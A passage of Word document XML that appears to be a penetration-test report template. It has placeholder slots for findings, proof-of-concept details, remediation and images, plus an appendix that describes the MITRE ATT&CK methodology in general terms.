              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#complianceviolations}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="5CEC1824">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{@text | convertHTML}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="09754D46">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="75281B82">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6BCAC53E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Image </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> – {caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="0FD51650">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="4F294C41" w14:textId="248D00BA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>complianceviolations</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="71D77A5D" w14:textId="207B72AC">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="458375E8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10206" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000142" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Test details</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000143" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{#poc}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000144" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">{@text | </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>convertHTML</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000145" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000146" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000147" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Image </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> – {caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000148" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000149" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>poc</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="5F4F16E0" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000014F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="8682" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000150" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#remediation}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000151" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t xml:space="preserve">{@text | </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>convertHTML</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000152" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000153" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000154" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Image </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> – {caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000155" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000156" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/remediation}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7C52B14E" w14:textId="5D8B5A53"/>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000163" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{/findings}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000164" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645205" w:id="35"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000165" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645206" w:id="36"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> - MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000166" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">{name} </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>utilizes</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK framework</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> as a basis for our </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>pentesting</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>methodology</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">. MITRE ATT&amp;CK is very well known and widely used in the cybersecurity field to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>possible attack</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> vectors that threat actors may use. It includes, but is not limited </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>to:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>initial</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> access, privilege escalation, credential access, and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000167" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>MITRE PRE-ATT&amp;CK:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000168" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">PRE-ATT&amp;CK focuses on the stages of the attack lifecycle that occur before a specific adversary actively engages with a target network. It encompasses the </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>initial</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> stages of the cyber kill chain, such as reconnaissance and weaponization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000169" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000016A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000016B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">This section covers the tactics, techniques, and procedures (TTPs) employed by adversaries after they have gained initial access to a target network. It is organized into matrices that </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>represent</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> various platforms (e.g., Windows, Linux, macOS) and detail the tactics and techniques associated with each.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000016C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="0000016D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6AB35369" wp14:editId="07777777">
            <wp:extent cx="4876800" cy="2476500"/>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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876800" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="0000016E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK Graphic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000016F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:pBdr>
          <w:top w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.49x2ik5" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
